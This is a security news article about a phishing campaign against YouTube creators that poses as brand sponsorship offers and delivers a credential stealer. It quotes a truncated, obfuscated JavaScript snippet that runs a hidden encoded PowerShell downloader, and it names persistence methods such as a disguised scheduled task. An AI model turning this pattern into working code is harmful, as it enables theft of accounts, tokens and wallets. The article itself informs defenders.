YouTube Creators Under Attack via Brand Collaborators Requests Using Clickflix Technique

A sophisticated phishing campaign dubbed the “Clickflix Technique” has emerged targeting YouTube content creators through seemingly legitimate brand collaboration requests.

This new attack vector exploits creators’ eagerness to secure sponsorship deals by disguising malware payloads as partnership documentation.

Cybercriminals initiate contact via email or social media, posing as marketing representatives from established brands offering lucrative deals that require the creator to review “campaign materials” hosted on compromised domains or cloud storage.

The attackers typically approach creators with subscriber counts between 10,000 and 500,000, carefully crafting messages that reference the creator’s content style and previous sponsorships to establish credibility.

Upon clicking the malicious links, creators are directed to professional-looking landing pages mimicking popular file-sharing services where they’re prompted to download what appears to be a PDF contract or campaign brief.

CloudSek researchers identified this campaign in early March 2025, noting that the malware employs a multi-stage infection process designed to evade traditional security solutions.

Their analysis revealed that over 2,300 creators have been targeted across gaming, technology review, and lifestyle niches, with approximately 18% of targets successfully compromised.

The attack leverages social engineering principles combined with technical deception, often including time-sensitive offers to pressure creators into hasty decisions.

Victims report receiving customized messages referencing specific videos they’ve produced, indicating significant reconnaissance efforts by the threat actors prior to initiating contact.

Infection Mechanism Exploits JavaScript Obfuscation

The malware’s primary infection vector employs a sophisticated JavaScript downloader that executes when victims open what appears to be a standard HTML preview page.

The initial payload utilizes multiple layers of obfuscation, with the final stage resembling this simplified example:-

const decoderKey = navigator.userAgent.slice(0,8);
eval(function(p,a,c,k,e,d){
  /* heavily obfuscated PowerShell downloader */  return p;
}('powershell -w hidden -e JGNsaWVudCA9...'))

This obfuscated code ultimately triggers a PowerShell command that downloads a stealer targeting browser data with particular emphasis on YouTube Studio credentials, Google authentication tokens, and cryptocurrency wallet information.

The malware establishes persistence through Windows Registry modifications and scheduled tasks with innocuous names like “GoogleUpdateTask” to avoid detection during routine system inspections.

The attack demonstrates the growing sophistication of targeted campaigns against content creators who increasingly represent valuable targets due to their monetization potential and access to engaged audience networks.

Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free